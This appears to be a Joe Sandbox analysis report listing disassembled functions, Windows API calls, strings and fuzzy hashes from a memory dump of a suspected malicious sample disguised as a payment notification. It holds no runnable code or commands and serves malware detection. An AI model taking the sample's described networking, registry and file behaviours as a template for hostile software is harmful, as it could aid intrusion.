Instruction ID: b20d6a5fff7f215ea11d9645c3f2c6176c43c088dd58383de7dc57ecc8e26141
Opcode Fuzzy Hash: 825bc78feddafd418d246dbec7aa9132f2f43a19a46b00036584325cbf259557
Instruction Fuzzy Hash: 2F51B2B1E0064A9FDB10CFA8D845AEEBBF9EF09300F15455EF956E7291D7309A41CB60

Function 00952D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00952D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00952D53
_ValidateLocalCookies.LIBCMT ref: 00952DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00952E0C
_ValidateLocalCookies.LIBCMT ref: 00952E61

Strings

csm, xrefs: 00952DF6

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 033a62aa14271f1f63dff685ea2df4c36a7269b79d37d7ae920c7ce5f072b61a
Instruction ID: f39db47f8686813cef05428f7addf4789a7434a06709f315d06df04643aaa5e2
Opcode Fuzzy Hash: 033a62aa14271f1f63dff685ea2df4c36a7269b79d37d7ae920c7ce5f072b61a
Instruction Fuzzy Hash: DF41C434E00209EBCF14DF6AC845A9EBBB5BF86366F148155ED146B392D731AA09CBD0

Function 009B10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009B307A
Part of subcall function 009B304E: _wcslen.LIBCMT ref: 009B309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009B1112
WSAGetLastError.WSOCK32 ref: 009B1121
WSAGetLastError.WSOCK32 ref: 009B11C9
closesocket.WSOCK32(00000000), ref: 009B11F9

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 2d1dd51a5e745d05c6a4db5b5653e95ec25bb5d60a915dd516a6e0fc31aff45b
Instruction ID: e1a6cf93ebf0faeffa0c90a3c1005dcea67a3fafac2f901a8fd11d6c7de9ff0f
Opcode Fuzzy Hash: 2d1dd51a5e745d05c6a4db5b5653e95ec25bb5d60a915dd516a6e0fc31aff45b
Instruction Fuzzy Hash: 71410371604604AFDB109F18C994BEABBE9EF85364F148059FD09AB292C774ED41CFE1

Function 0099CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0099CF22,?), ref: 0099DDFD

Part of subcall function 0099DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0099CF22,?), ref: 0099DE16

lstrcmpiW.KERNEL32(?,?), ref: 0099CF45
MoveFileW.KERNEL32(?,?), ref: 0099CF7F
_wcslen.LIBCMT ref: 0099D005
_wcslen.LIBCMT ref: 0099D01B
SHFileOperationW.SHELL32(?), ref: 0099D061

Strings

\*.*, xrefs: 0099CFF3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: a0d7a40150418586dc2a3f91c8471ac7c16b903977bdb2b6caa81bcd230a74bb
Instruction ID: ce5652f48e35aa163e498daae7d9d847b3b7b369d18c8d4086a2e8b6c1eb36c3
Opcode Fuzzy Hash: a0d7a40150418586dc2a3f91c8471ac7c16b903977bdb2b6caa81bcd230a74bb
Instruction Fuzzy Hash: 204126B19452185FDF12EBA8DD81FDDB7BDAF58380F1000E6E509EB142EB34A688CB50

Function 009C2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009C2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 009C2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 009C2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009C2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009C2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 009C2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009C2F0B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ae42a1fae6f99ef9d1fd195505b7bec0c190dd13f82b5aa1180ab48dd7ea3332
Instruction ID: faf53bec24248347c72fb1b58aeff2e63b28fd9b7466ad2cea0e10749d5ee53b
Opcode Fuzzy Hash: ae42a1fae6f99ef9d1fd195505b7bec0c190dd13f82b5aa1180ab48dd7ea3332
Instruction Fuzzy Hash: 82311730A081599FDB21DF58DD84FA53BE5FB8A750F150168F9059F2B1CB71AC41DB42

Function 00997726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00997769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0099778F
SysAllocString.OLEAUT32(00000000), ref: 00997792
SysAllocString.OLEAUT32(?), ref: 009977B0
SysFreeString.OLEAUT32(?), ref: 009977B9
StringFromGUID2.OLE32(?,?,00000028), ref: 009977DE
SysAllocString.OLEAUT32(?), ref: 009977EC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2e8dfac2ee93a388f3ffcbae1b600b69f920e55bd47a0a122ecbf58e47f6d02a
Instruction ID: 1a1df2825fb71893704cb00fce6b9ffd008ae96ca6ff6644037bbd0c0ef18e71
Opcode Fuzzy Hash: 2e8dfac2ee93a388f3ffcbae1b600b69f920e55bd47a0a122ecbf58e47f6d02a
Instruction Fuzzy Hash: 1921A176A18219AFDF10DFEDCC88DBBB7ACEB097647048425FA19DB260DA74DC418760

Function 009977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00997842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00997868
SysAllocString.OLEAUT32(00000000), ref: 0099786B
SysAllocString.OLEAUT32 ref: 0099788C
SysFreeString.OLEAUT32 ref: 00997895
StringFromGUID2.OLE32(?,?,00000028), ref: 009978AF
SysAllocString.OLEAUT32(?), ref: 009978BD

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 5019c72aa599faef8d89cfda90e0f5a466a6f4ffefb1c7c163122467fd121021
Instruction ID: 4cb60b9e5219631d5167b698094edf29c67c8563c3a9f8d740ce7a0e6ab01702
Opcode Fuzzy Hash: 5019c72aa599faef8d89cfda90e0f5a466a6f4ffefb1c7c163122467fd121021
Instruction Fuzzy Hash: C2216D72A18204AFDF10AFEDDC88DAAB7ACEB097607148125F915CB2A1DA74DC41DB64

Function 009A04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009A04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009A052E

Strings

nul, xrefs: 009A0567

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 66a705eacbadf3a5ee12fbf2c112b198207868a7b51cc03c551a3d17b09cc2d9
Instruction ID: 9faf50e221457ba3f0be79ceb2e65e9abab8253c4808b7defa254ab2039080f4
Opcode Fuzzy Hash: 66a705eacbadf3a5ee12fbf2c112b198207868a7b51cc03c551a3d17b09cc2d9
Instruction Fuzzy Hash: 82217171D003059BDB209F6ADC44A5A7BB8BF86764F204A19F8A1D61E0E770D950DFA0

Function 009A05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009A05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009A0601

Strings

nul, xrefs: 009A0639

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a73c58afb7b01d0b599f59966155778d98f0884556fa854d3299f1d2bda0778c
Instruction ID: d65e93d71cdac88a2241ac899505d37e4958e066d165b59d2604fa501de270d3
Opcode Fuzzy Hash: a73c58afb7b01d0b599f59966155778d98f0884556fa854d3299f1d2bda0778c
Instruction Fuzzy Hash: FA2165759043059BDB209F69DC04E5A77E8BFD6728F200B19F9A1E72D0E770D960DB90

Function 009C40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0093600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0093604C
Part of subcall function 0093600E: GetStockObject.GDI32(00000011), ref: 00936060
Part of subcall function 0093600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009C4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009C411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009C412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009C4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009C4145

Strings

Msctls_Progress32, xrefs: 009C40E3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: f58470a74f9218a1a618edb173de62d157fd0afe8bff74c3470c704efbdaf619
Instruction ID: eb121c46d33461b727672ffe65a80f2afccf568fd7a6298f85c691e29a643b0c
Opcode Fuzzy Hash: f58470a74f9218a1a618edb173de62d157fd0afe8bff74c3470c704efbdaf619
Instruction Fuzzy Hash: 7A1190B265021DBEEF118EA4CC86EE77F9DEF18798F004111FA18A2050C6729C219BA4

Function 0096D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0096D7A3: _free.LIBCMT ref: 0096D7CC

_free.LIBCMT ref: 0096D82D

Part of subcall function 009629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000), ref: 009629DE
Part of subcall function 009629C8: GetLastError.KERNEL32(00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000,00000000), ref: 009629F0

_free.LIBCMT ref: 0096D838
_free.LIBCMT ref: 0096D843
_free.LIBCMT ref: 0096D897
_free.LIBCMT ref: 0096D8A2
_free.LIBCMT ref: 0096D8AD
_free.LIBCMT ref: 0096D8B8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ecadcfc43e15a27e76d03cadd1c3771c5ad4d90e4dee0dac3b14e73025b7988c
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: E31133B1B42B04BAE521BFF0CC47FCB7BDC6FC4740F444826B2A9A6492DA75B5054751

Function 0099DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0099DA74
LoadStringW.USER32(00000000), ref: 0099DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0099DA91
LoadStringW.USER32(00000000), ref: 0099DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0099DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0099DAB9

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 147f96d9864d09faef8cf58206e51916091ab6e387d8f069dd0ef0fd28bc929a
Instruction ID: 84a06ad00e3d11f274bc497393e58f0f35553af631af72d2d9f02183984d91a0
Opcode Fuzzy Hash: 147f96d9864d09faef8cf58206e51916091ab6e387d8f069dd0ef0fd28bc929a
Instruction Fuzzy Hash: BA0186F29042087FEB10ABA49D89EFB376CE708301F400895F74AE2081EA749E845F74

Function 009A096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0103E508,0103E508), ref: 009A097B
EnterCriticalSection.KERNEL32(0103E4E8,00000000), ref: 009A098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 009A099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009A09A9
CloseHandle.KERNEL32(00000000), ref: 009A09B8
InterlockedExchange.KERNEL32(0103E508,000001F6), ref: 009A09C8
LeaveCriticalSection.KERNEL32(0103E4E8), ref: 009A09CF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 996b1c51e0057273eb2a31192cf91cda297d8844ecc6abd3b12fdf4ffe064bf5
Instruction ID: 7266f37a66388851383e679cd7181b7211add725f0856680e2079b4a0d2ba90c
Opcode Fuzzy Hash: 996b1c51e0057273eb2a31192cf91cda297d8844ecc6abd3b12fdf4ffe064bf5
Instruction Fuzzy Hash: 27F03C7285AA02BBD7415FA4EE8CFD6BF39FF41702F402025F206908A0C7749465DF90

Function 009B1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009B1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009B1DE1
WSAGetLastError.WSOCK32 ref: 009B1DF2
htons.WSOCK32(?,?,?,?,?), ref: 009B1EDB
inet_ntoa.WSOCK32(?), ref: 009B1E8C

Part of subcall function 009939E8: _strlen.LIBCMT ref: 009939F2

Part of subcall function 009B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,009AEC0C), ref: 009B3240

_strlen.LIBCMT ref: 009B1F35

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 66c98c3a9bb3404a8c36395233b0de85334b6fcc8025713ceaebd931031a097d
Instruction ID: 8cd86e0034d55071404e8985cec7136ebbf2c09a6fd9c9fc9aa7786e0a502b37
Opcode Fuzzy Hash: 66c98c3a9bb3404a8c36395233b0de85334b6fcc8025713ceaebd931031a097d
Instruction Fuzzy Hash: 0DB1C071604300AFC324DF24C895F6A7BA9AFC4328F94894CF55A5B2E2DB71ED45CB91

Function 009601B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 009600BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009600D6
__allrem.LIBCMT ref: 009600ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096010B
__allrem.LIBCMT ref: 00960122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00960140

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 9b78da9b9de1cbb91d03bad9288b606dba26da0b30f1e718117a6863a358d984
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 9D81F572A00706ABE720DF29CC91B6B73E9EFC1334F25453AF851DA681E770D9448B90

Function 009661FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009582D9,009582D9,?,?,?,0096644F,00000001,00000001,8BE85006), ref: 00966258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0096644F,00000001,00000001,8BE85006,?,?,?), ref: 009662DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009663D8
__freea.LIBCMT ref: 009663E5

Part of subcall function 00963820: RtlAllocateHeap.NTDLL(00000000,?,00A01444,?,0094FDF5,?,?,0093A976,00000010,00A01440,009313FC,?,009313C6,?,00931129), ref: 00963852

__freea.LIBCMT ref: 009663EE
__freea.LIBCMT ref: 00966413

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: fa6a9ac6d5cbe684602357b7493ed501c47d6ccfcd0eff5d65c0179aa2c18088
Instruction ID: 67eb3b3c28182d6dc30dbd3447db448872ed914adfbf2077f7e30bdb2f87a53e
Opcode Fuzzy Hash: fa6a9ac6d5cbe684602357b7493ed501c47d6ccfcd0eff5d65c0179aa2c18088
Instruction Fuzzy Hash: A651B072A10216ABEB258F64DC81FBF7BA9EF85750F15462AFC05DA250EB34DC40D6A0

Function 009BBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 009BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009BB6AE,?,?), ref: 009BC9B5
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BC9F1
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BCA68
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009BBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009BBD25
RegCloseKey.ADVAPI32(00000000), ref: 009BBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009BBD99
